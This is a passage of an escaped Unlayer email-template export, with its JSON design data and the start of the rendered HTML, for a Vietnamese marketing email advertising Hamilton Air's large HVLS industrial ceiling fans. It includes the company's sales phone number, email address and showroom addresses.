":\\\"04gNugS9ys\\\",\\\"cells\\\":[1],\\\"columns\\\":[{\\\"id\\\":\\\"2mvPoFJCm5\\\",\\\"contents\\\":[{\\\"id\\\":\\\"b4uM-C0_g7\\\",\\\"type\\\":\\\"button\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px\\\",\\\"anchor\\\":\\\"\\\",\\\"href\\\":{\\\"name\\\":\\\"phone\\\",\\\"values\\\":{\\\"href\\\":\\\"\\\",\\\"target\\\":\\\"_blank\\\",\\\"phone\\\":\\\"02873033369\\\"},\\\"attrs\\\":{\\\"href\\\":\\\"tel:{{phone}}\\\"}},\\\"buttonColors\\\":{\\\"color\\\":\\\"#FFFFFF\\\",\\\"backgroundColor\\\":\\\"#74bcda\\\",\\\"hoverColor\\\":\\\"#FFFFFF\\\",\\\"hoverBackgroundColor\\\":\\\"#3AAEE0\\\"},\\\"size\\\":{\\\"autoWidth\\\":true,\\\"width\\\":\\\"100%\\\"},\\\"fontSize\\\":\\\"14px\\\",\\\"textAlign\\\":\\\"center\\\",\\\"lineHeight\\\":\\\"120%\\\",\\\"padding\\\":\\\"10px\\\",\\\"border\\\":{},\\\"borderRadius\\\":\\\"4px\\\",\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_button_11\\\",\\\"htmlClassNames\\\":\\\"u_content_button\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<span style=\\\\\\\"line-height: 16.8px;\\\\\\\">CALLL NGAY <\\/span>\\\",\\\"calculatedWidth\\\":101,\\\"calculatedHeight\\\":37}},{\\\"id\\\":\\\"U54rwmEkOc\\\",\\\"type\\\":\\\"text_deprecated\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"23px 40px 10px\\\",\\\"anchor\\\":\\\"\\\",\\\"color\\\":\\\"#b8b8b8\\\",\\\"textAlign\\\":\\\"center\\\",\\\"lineHeight\\\":\\\"140%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_text_5\\\",\\\"htmlClassNames\\\":\\\"u_content_text\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<p style=\\\\\\\"font-size: 14px; line-height: 140%;\\\\\\\"><span style=\\\\\\\"color: #000000; line-height: 19.6px;\\\\\\\">T\\u1ed5ng \\u0111\\u00e0i b\\u00e1n h\\u00e0ng: 028.73033369<\\/span><br \\/><span style=\\\\\\\"color: #000000; line-height: 19.6px;\\\\\\\">EMAIL: sale@hogiaphat.vn\\u00a0<\\/span><br \\/><span style=\\\\\\\"color: #000000; line-height: 19.6px;\\\\\\\">SR Th\\u1ee7 \\u0110\\u1ee9c: 184 Tr\\u1ea7n L\\u1ef1u, An Ph\\u00fa, Tp Th\\u1ee7 \\u0110\\u1ee9c, Tp HCM<\\/span><\\/p>\\\\n<p style=\\\\\\\"font-size: 14px; line-height: 140%;\\\\\\\"><span style=\\\\\\\"color: #000000; line-height: 19.6px;\\\\\\\">SR Qu\\u1eadn 7: Happy Valley, 812 Nguy\\u1ec5n V\\u0103n Linh, T\\u00e2n Phong, Qu\\u1eadn 7, Tp HCM<\\/span><\\/p>\\\",\\\"hideMobile\\\":false}},{\\\"id\\\":\\\"N9ssy1A_Ok\\\",\\\"type\\\":\\\"text_deprecated\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"15px 40px\\\",\\\"anchor\\\":\\\"\\\",\\\"color\\\":\\\"#bbbbbb\\\",\\\"textAlign\\\":\\\"center\\\",\\\"lineHeight\\\":\\\"140%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_text_6\\\",\\\"htmlClassNames\\\":\\\"u_content_text\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<p style=\\\\\\\"font-size: 14px; line-height: 140%;\\\\\\\"><span style=\\\\\\\"font-size: 12px; line-height: 16.8px; color: #000000;\\\\\\\">\\u00a9Hamiton Air Fans\\u2122. All Rights Reserved.<\\/span><\\/p>\\\\n<p style=\\\\\\\"font-size: 14px; line-height: 140%;\\\\\\\"><span style=\\\\\\\"font-size: 12px; line-height: 16.8px; color: #000000;\\\\\\\">C\\u00d4NG TY C\\u1ed4 PH\\u1ea6N C\\u00d4NG NGH\\u1ec6 HAMILTON AIR<br \\/>MST: 0315778682 do s\\u1edf KH v\\u00e0 \\u0111\\u1ea7u t\\u01b0 Tp.HCM.\\u00a0<\\/span><\\/p>\\\",\\\"hideMobile\\\":false}}],\\\"values\\\":{\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_column_6\\\",\\\"htmlClassNames\\\":\\\"u_column\\\"},\\\"border\\\":{},\\\"padding\\\":\\\"0px\\\",\\\"backgroundColor\\\":\\\"#ecf0f1\\\"}}],\\\"values\\\":{\\\"displayCondition\\\":null,\\\"columns\\\":false,\\\"backgroundColor\\\":\\\"\\\",\\\"columnsBackgroundColor\\\":\\\"#272362\\\",\\\"backgroundImage\\\":{\\\"url\\\":\\\"\\\",\\\"fullWidth\\\":true,\\\"repeat\\\":\\\"no-repeat\\\",\\\"size\\\":\\\"custom\\\",\\\"position\\\":\\\"top-center\\\",\\\"customPosition\\\":[\\\"50%\\\",\\\"0%\\\"]},\\\"padding\\\":\\\"0px\\\",\\\"anchor\\\":\\\"\\\",\\\"hideDesktop\\\":false,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_row_5\\\",\\\"htmlClassNames\\\":\\\"u_row\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"hideMobile\\\":false,\\\"noStackMobile\\\":false}}],\\\"values\\\":{\\\"popupPosition\\\":\\\"center\\\",\\\"popupWidth\\\":\\\"600px\\\",\\\"popupHeight\\\":\\\"auto\\\",\\\"borderRadius\\\":\\\"10px\\\",\\\"contentAlign\\\":\\\"center\\\",\\\"contentVerticalAlign\\\":\\\"center\\\",\\\"contentWidth\\\":\\\"600px\\\",\\\"fontFamily\\\":{\\\"label\\\":\\\"Open Sans\\\",\\\"value\\\":\\\"\'Open Sans\',sans-serif\\\",\\\"url\\\":\\\"https:\\/\\/fonts.googleapis.com\\/css?family=Open+Sans:400,700\\\",\\\"defaultFont\\\":true},\\\"textColor\\\":\\\"#000000\\\",\\\"popupBackgroundColor\\\":\\\"#FFFFFF\\\",\\\"popupBackgroundImage\\\":{\\\"url\\\":\\\"\\\",\\\"fullWidth\\\":true,\\\"repeat\\\":\\\"no-repeat\\\",\\\"size\\\":\\\"cover\\\",\\\"position\\\":\\\"top-center\\\",\\\"customPosition\\\":[\\\"50%\\\",\\\"0%\\\"]},\\\"popupOverlay_backgroundColor\\\":\\\"rgba(0, 0, 0, 0.1)\\\",\\\"popupCloseButton_position\\\":\\\"top-right\\\",\\\"popupCloseButton_backgroundColor\\\":\\\"#DDDDDD\\\",\\\"popupCloseButton_iconColor\\\":\\\"#000000\\\",\\\"popupCloseButton_borderRadius\\\":\\\"0px\\\",\\\"popupCloseButton_margin\\\":\\\"0px\\\",\\\"popupCloseButton_action\\\":{\\\"name\\\":\\\"close_popup\\\",\\\"attrs\\\":{\\\"onClick\\\":\\\"document.querySelector(\'.u-popup-container\').style.display = \'none\';\\\"}},\\\"backgroundColor\\\":\\\"#ffffff\\\",\\\"backgroundImage\\\":{\\\"url\\\":\\\"\\\",\\\"fullWidth\\\":true,\\\"repeat\\\":\\\"no-repeat\\\",\\\"size\\\":\\\"custom\\\",\\\"position\\\":\\\"top-center\\\",\\\"customPosition\\\":[\\\"50%\\\",\\\"0%\\\"]},\\\"preheaderText\\\":\\\"\\\",\\\"linkStyle\\\":{\\\"body\\\":true,\\\"linkColor\\\":\\\"#363675\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":false,\\\"linkHoverUnderline\\\":true,\\\"inherit\\\":false},\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_body\\\",\\\"htmlClassNames\\\":\\\"u_body\\\"}}},\\\"schemaVersion\\\":13}\"', '\"<!DOCTYPE HTML PUBLIC \\\"-\\/\\/W3C\\/\\/DTD XHTML 1.0 Transitional \\/\\/EN\\\" \\\"http:\\/\\/www.w3.org\\/TR\\/xhtml1\\/DTD\\/xhtml1-transitional.dtd\\\">\\r\\n<html xmlns=\\\"http:\\/\\/www.w3.org\\/1999\\/xhtml\\\" xmlns:v=\\\"urn:schemas-microsoft-com:vml\\\" xmlns:o=\\\"urn:schemas-microsoft-com:office:office\\\">\\r\\n<head>\\r\\n<!--[if gte mso 9]>\\r\\n<xml>\\r\\n  <o:OfficeDocumentSettings>\\r\\n    <o:AllowPNG\\/>\\r\\n    <o:PixelsPerInch>96<\\/o:PixelsPerInch>\\r\\n  <\\/o:OfficeDocumentSettings>\\r\\n<\\/xml>\\r\\n<![endif]-->\\r\\n  <meta http-equiv=\\\"Content-Type\\\" content=\\\"text\\/html; charset=UTF-8\\\">\\r\\n  <meta name=\\\"viewport\\\" content=\\\"width=device-width, initial-scale=1.0\\\">\\r\\n  <meta name=\\\"x-apple-disable-message-reformatting\\\">\\r\\n  <!--[if !mso]><!--><meta http-equiv=\\\"X-UA-Compatible\\\" content=\\\"IE=edge\\\"><!--<![endif]-->\\r\\n  <title><\\/title>\\r\\n  \\r\\n    <style type=\\\"text\\/css\\\">\\r\\n      @media only screen and (min-width: 620px) {\\r\\n  .u-row {\\r\\n    width: 600px !important;\\r\\n  }\\r\\n  .u-row .u-col {\\r\\n    vertical-align: top;\\r\\n  }\\r\\n\\r\\n  .u-row .u-col-33p33 {\\r\\n    width: 199.98px !important;\\r\\n  }\\r\\n\\r\\n  .u-row .u-col-50 {\\r\\n    width: 300px !important;\\r\\n  }\\r\\n\\r\\n  .u-row .u-col-100 {\\r\\n    width: 600px !important;\\r\\n  }\\r\\n\\r\\n}\\r\\n\\r\\n@media (max-width: 620px) {\\r\\n  .u-row-container {\\r\\n    max-width: 100% !important;\\r\\n    padding-left: 0px !important;\\r\\n    padding-right: 0px !important;\\r\\n  }\\r\\n  .u-row .u-col {\\r\\n    min-width: 320px !important;\\r\\n    max-width: 100% !important;\\r\\n    display: block !important;\\r\\n  }\\r\\n  .u-row {\\r\\n    width: 100% !important;\\r\\n  }\\r\\n  .u-col {\\r\\n    width: 100% !important;\\r\\n  }\\r\\n  .u-col > div {\\r\\n    margin: 0 auto;\\r\\n  }\\r\\n}\\r\\na[x-apple-data-detectors=\'true\'] {\\r\\n  color: inherit !important;\\r\\n  text-decoration: none !important;\\r\\n}\\r\\n\\r\\n<\\/style>\\r\\n  \\r\\n  \\r\\n\\r\\n<!--[if !mso]><!--><link href=\\\"https:\\/\\/fonts.googleapis.com\\/css?family=Source+Sans+Pro:400,700\\\" rel=\\\"stylesheet\\\" type=\\\"text\\/css\\\"><link href=\\\"https:\\/\\/fonts.googleapis.com\\/css?family=Open+Sans:400,700\\\" rel=\\\"stylesheet\\\" type=\\\"text\\/css\\\"><!--<![endif]-->\\r\\n\\r\\n<\\/head>\\r\\n\\r\\n<body class=\\\"clean-body u_body\\\" style=\\\"margin: 0;padding: 0;-webkit-text-size-adjust: 100%;background-color: #ffffff;color: #000000\\\">\\r\\n  <!--[if IE]><div class=\\\"ie-container\\\"><![endif]-->\\r\\n  <!--[if mso]><div class=\\\"mso-container\\\"><![endif]-->\\r\\n  <table style=\\\"border-collapse: collapse;table-layout: fixed;border-spacing: 0;mso-table-lspace: 0pt;mso-table-rspace: 0pt;vertical-align: top;min-width: 320px;Margin: 0 auto;background-color: #ffffff;width:100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\">\\r\\n  <tbody>\\r\\n  <tr style=\\\"vertical-align: top\\\">\\r\\n    <td style=\\\"word-break: break-word;border-collapse: collapse !important;vertical-align: top\\\">\\r\\n    <!--[if (mso)|(IE)]><table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\"><tr><td align=\\\"center\\\" style=\\\"background-color: #ffffff;\\\"><![endif]-->\\r\\n    \\r\\n\\r\\n<div class=\\\"u-row-container\\\" style=\\\"padding: 0px;background-color: transparent\\\">\\r\\n  <div class=\\\"u-row\\\" style=\\\"Margin: 0 auto;min-width: 320px;max-width: 600px;overflow-wrap: break-word;word-wrap: break-word;word-break: break-word;background-color: #fbfdff;\\\">\\r\\n    <div style=\\\"border-collapse: collapse;display: table;width: 100%;height: 100%;background-color: transparent;\\\">\\r\\n      <!--[if (mso)|(IE)]><table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\"><tr><td style=\\\"padding: 0px;background-color: transparent;\\\" align=\\\"center\\\"><table cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\" style=\\\"width:600px;\\\"><tr style=\\\"background-color: #fbfdff;\\\"><![endif]-->\\r\\n      \\r\\n<!--[if (mso)|(IE)]><td align=\\\"center\\\" width=\\\"600\\\" style=\\\"background-color: #ecf0f1;width: 600px;padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n<div class=\\\"u-col u-col-100\\\" style=\\\"max-width: 320px;min-width: 600px;display: table-cell;vertical-align: top;\\\">\\r\\n  <div style=\\\"background-color: #ecf0f1;height: 100%;width: 100% !important;\\\">\\r\\n  <!--[if (!mso)&(!IE)]><!--><div style=\\\"box-sizing: border-box; height: 100%; padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\"><!--<![endif]-->\\r\\n  \\r\\n<table style=\\\"font-family:\'Open Sans\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px;font-family:\'Open Sans\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n<table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\">\\r\\n  <tr>\\r\\n    <td style=\\\"padding-right: 0px;padding-left: 0px;\\\" align=\\\"center\\\">\\r\\n      \\r\\n      <img align=\\\"center\\\" border=\\\"0\\\" src=\\\"https:\\/\\/assets.unlayer.com\\/stock-templates1680167194545-logo_sunon.png\\\" alt=\\\"Image\\\" title=\\\"Image\\\" style=\\\"outline: none;text-decoration: none;-ms-interpolation-mode: bicubic;clear: both;display: inline-block !important;border: none;height: auto;float: none;width: 100%;max-width: 580px;\\\" width=\\\"580\\\"\\/>\\r\\n      \\r\\n    <\\/td>\\r\\n  <\\/tr>\\r\\n<\\/table>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table style=\\\"font-family:\'Open Sans\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px 10px 0px;font-family:\'Open Sans\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <div style=\\\"font-family: inherit; font-weight: 700; color: #000000; line-height: 140%; text-align: center; word-wrap: break-word;\\\">\\r\\n    <p style=\\\"font-size: 14px; line-height: 140%;\\\">\\u00a0QU\\u1ea0T TREO TR\\u1ea6N C\\u00c1NH L\\u1edaN HVLS - THO\\u1ea2I M\\u00c1I C\\u00d4NG NGHI\\u1ec6P V\\u1edaI <span style=\\\"font-size: 14px; line-height: 19.6px;\\\"><span style=\\\"line-height: 19.6px;\\\">TI\\u1ebeT<\\/span> <\\/span>KI\\u1ec6M N\\u0102NG L\\u01af\\u1ee2NG L\\u1edaN.<\\/p>\\r\\n  <\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table style=\\\"font-family:\'Open Sans\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px;font-family:\'Open Sans\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <h1 style=\\\"margin: 0px; color: #236fa1; line-height: 140%; text-align: center; word-wrap: break-word; font-family: inherit; font-size: 22px; \\\">M\\u1ed9t kho\\u1ea3nh kh\\u1eafc th\\u01b0 gi\\u00e3n v\\u1edbi l\\u00e0n gi\\u00f3 m\\u1ea1nh v\\u00e0 d\\u1ecbu d\\u00e0ng<\\/h1>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table style=\\\"font-family:\'Open Sans\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px;font-family:\'Open Sans\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <h2 style=\\\"margin: 0px; line-height: 140%; text-align: center; word-wrap: break-word; font-family: inherit; font-size: 22px; font-weight: 700; \\\">Powerful HVLS Fan series 1<\\/h2>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table style=\\\"font-family:\'Open Sans\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px;font-family:\'Open Sans\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n<table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\">\\r\\n  <tr>\\r\\n    <td style=\\\"padding-right: 0px;padding-left: 0px;\\\" align=\\\"center\\\">\\r\\n      \\r\\n      <img align=\\\"center\\\" border=\\\"0\\\" src=\\\"https:\\/\\/assets.unlayer.com\\/stock-templates1681371874963-Powerful1-02.jpg\\\" alt=\\\"\\\" title=\\\"\\\" style=\\\"outline: none;text-decoration: none;-ms-interpolation-mode: bicubic;clear: both;display: inline-block !important;border: none;height: auto;float: none;width: 100%;max-width: 580px;\\\" width=\\\"580\\\"\\/>\\r\\n      \\r\\n    <\\/td>\\r\\n  <\\/tr>\\r\\n<\\/table>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table style=\\\"font-family:\'Open Sans\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px;font-family:\'Open Sans\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <table height=\\\"0px\\\" align=\\\"center\\\" border=\\\"0\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" style=\\\"border-collapse: collapse;table-layout: fixed;border-spacing: 0;mso-table-lspace: 0pt;mso-table-rspace: 0pt;vertical-align: top;border-top: 1px solid #BBBBBB;-ms-text-size-adjust: 100%;-webkit-text-size-adjust: 100%\\\">\\r\\n    <tbody>\\r\\n      <tr style=\\\"vertical-align: top\\\">\\r\\n        <td style=\\\"word-break: break-word;border-collapse: collapse !important;vertical-align: top;font-size: 0px;line-height: 0px;mso-line-height-rule: exactly;-ms-text-size-adjust: 100%;-webkit-text-size-adjust: 100%\\\">\\r\\n          <span>&#160;<\\/span>\\r\\n        <\\/td>\\r\\n      <\\/tr>\\r\\n    <\\/tbody>\\r\\n  <\\/table>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n  <!--[if (!mso)&(!IE)]><!--><\\/div><!--<![endif]-->\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n<!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n      <!--[if (mso)|(IE)]><\\/tr><\\/table><\\/td><\\/tr><\\/table><![endif]-->\\r\\n    <\\/div>\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n\\r\\n\\r\\n\\r\\n<div class=\\\"u-row-container\\\" style=\\\"padding: 0px;background-color: transparent\\\">\\r\\n  <div class=\\\"u-row\\\" style=\\\"Margin: 0 auto;min-width: 320px;max-width: 600px;overflow-wrap: break-word;word-wrap: break-word;word-break: break-word;background-color: transparent;\\\">\\r\\n    <div style=\\\"border-collapse: collapse;display: table;width: 100%;height: 100%;background-color: transparent;\\\">\\r\\n      <!--[if (mso)|(IE)]><table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\"><tr><td style=\\\"padding: 0px;background-color: transparent;\\\" align=\\\"center\\\"><table cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\" style=\\\"width:600px;\\\"><tr style=\\\"background-color: transparent;\\\"><![endif]-->\\r\\n      \\r\\n<!--[if (mso)|(IE)]><td align=\\\"center\\\" width=\\\"300\\\" style=\\\"background-color: #ecf0f1;width: 300px;padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;border-radius: 0px;-webkit-border-radius: 0px; -moz-border-radius: 0px;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n<div class=\\\"u-col u-col-50\\\" style=\\\"max-width: 320px;min-width: 300px;display: table-cell;vertical-align: top;\\\">\\r\\n  <div style=\\\"background-color: #ecf0f1;height: 100%;width: 100% !important;border-radius: 0px;-webkit-border-radius: 0px; -moz-border-radius: 0px;\\\">\\r\\n  <!--[if (!mso)&(!IE)]><!--><div style=\\\"box-sizing: border-box; height: 100%; padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;border-radius: 0px;-webkit-border-radius: 0px; -moz-border-radius: 0px;\\\"><!--<![endif]-->\\r\\n  \\r\\n<table style=\\\"font-family:\'Open Sans\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px;font-family:\'Open Sans\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n<table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\">\\r\\n  <tr>\\r\\n    <td style=\\\"padding-right: 0px;padding-left: 0px;\\\" align=\\\"center\\\">\\r\\n      \\r\\n      <img align=\\\"center\\\" border=\\\"0\\\" src=\\\"https:\\/\\/assets.unlayer.com\\/stock-templates1681371919938-1-06.jpg\\\" alt=\\\"\\\" title=\\\"\\\" style=\\\"outline: none;text-decoration: none;-ms-interpolation-mode: bicubic;clear: both;display: inline-block !important;border: none;height: auto;float: none;width: 100%;max-width: 280px;\\\" width=\\\"280\\\"\\/>\\r\\n      \\r\\n    <\\/td>\\r\\n  <\\/tr>\\r\\n<\\/table>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n  <!--[if (!mso)&(!IE)]><!--><\\/div><!--<![endif]-->\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n<!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n<!--[if (mso)|(IE)]><td align=\\\"center\\\" width=\\\"300\\\" style=\\\"background-color: #ecf0f1;width: 300px;padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;border-radius: 0px;-webkit-border-radius: 0px; -moz-border-radius: 0px;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n<div class=\\\"u-col u-col-50\\\" style=\\\"max-width: 320px;min-width: 300px;display: table-cell;vertical-align: top;\\\">\\r\\n  <div style=\\\"background-color: #ecf0f1;height: 100%;width: 100% !important;border-radius: 0px;-webkit-border-radius: 0px; -moz-border-radius: 0px;\\\">\\r\\n  <!--[if (!mso)&(!IE)]><!--><div style=\\\"box-sizing: border-box; height: 100%; padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;border-radius: 0px;-webkit-border-radius: 0px; -moz-border-radius: 0px;\\\"><!--<![endif]-->\\r\\n  \\r\\n<table style=\\\"font-family:\'Open Sans\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px;font-family:\'Open Sans\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <div style=\\\"line-height: 140%; text-align: center; word-wrap: break-word;\\\">\\r\\n    <p style=\\\"line-height: 140%;\\\"><strong>PHONG C\\u00c1CH C\\u00d4NG NGHI\\u1ec6P T\\u1ed0I GI\\u1ea2N<\\/strong><br \\/>Qu\\u1ea1t HVLS n\\u00e0y c\\u00f3 c\\u1ea3 t\\u00ednh th\\u1ea9m m\\u1ef9 v\\u00e0 ch\\u1ee9c n\\u0103ng. Thi\\u1ebft k\\u1ebf t\\u1ed1i gi\\u1ea3n v\\u00e0 c\\u00f4ng nghi\\u1ec7p kh\\u00f4ng c\\u00f3 chi ti\\u1ebft trang tr\\u00ed th\\u1eeba, ph\\u00f9 h\\u1ee3p v\\u1edbi m\\u1ecdi phong c\\u00e1ch v\\u00e0 kh\\u00f4ng gian th\\u01b0\\u01a1ng m\\u1ea1i.<\\/p>\\r\\n  <\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n  <!--[if (!mso)&(!IE)]><!--><\\/div><!--<![endif]-->\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n<!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n      <!--[if (mso)|(IE)]><\\/tr><\\/table><\\/td><\\/tr><\\/table><![endif]-->\\r\\n    <\\/div>\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n\\r\\n\\r\\n\\r\\n<div class=\\\"u-row-container\\\" style=\\\"padding: 0px;background-color: transparent\\\">\\r\\n  <div class=\\\"u-row\\\" style=\\\"Margin: 0 auto;min-width: 320px;max-width: 600px;overflow-wrap: break-word;word-wrap: break-word;word-break: break-word;background-color: transparent;\\\">\\r\\n    <div style=\\\"border-collapse: collapse;display: table;width: 100%;height: 100%;background-color: transparent;\\\">\\r\\n      <!--[if (mso)|(IE)]><table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\"><tr><td style=\\\"padding: 0px;background-color: transparent;\\\" align=\\\"center\\\"><table cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\" style=\\\"width:600px;\\\"><tr style=\\\"background-color: transparent;\\\"><![endif]-->\\r\\n      \\r\\n<!--[if (mso)|(IE)]><td align=\\\"center\\\" width=\\\"300\\\" style=\\\"background-color: #ecf0f1;width: 300px;padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;border-radius: 0px;-webkit-border-radius: 0px; -moz-border-radius: 0px;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n<div class=\\\"u-col u-col-50\\\" style=\\\"max-width: 320px;min-width: 300px;display: table-cell;vertical-align: top;\\\">\\r\\n  <div style=\\\"background-color: #ecf0f1;height: 100%;width: 100% !important;border-radius: 0px;-webkit-border-radius: 0px; -moz-border-radius: 0px;\\\">\\r\\n  <!--[if (!mso)&(!IE)]><!--><div style=\\\"box-sizing: border-box; height: 100%; padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;border-radius: 0px;-webkit-border-radius: 0px; -moz-border-radius: 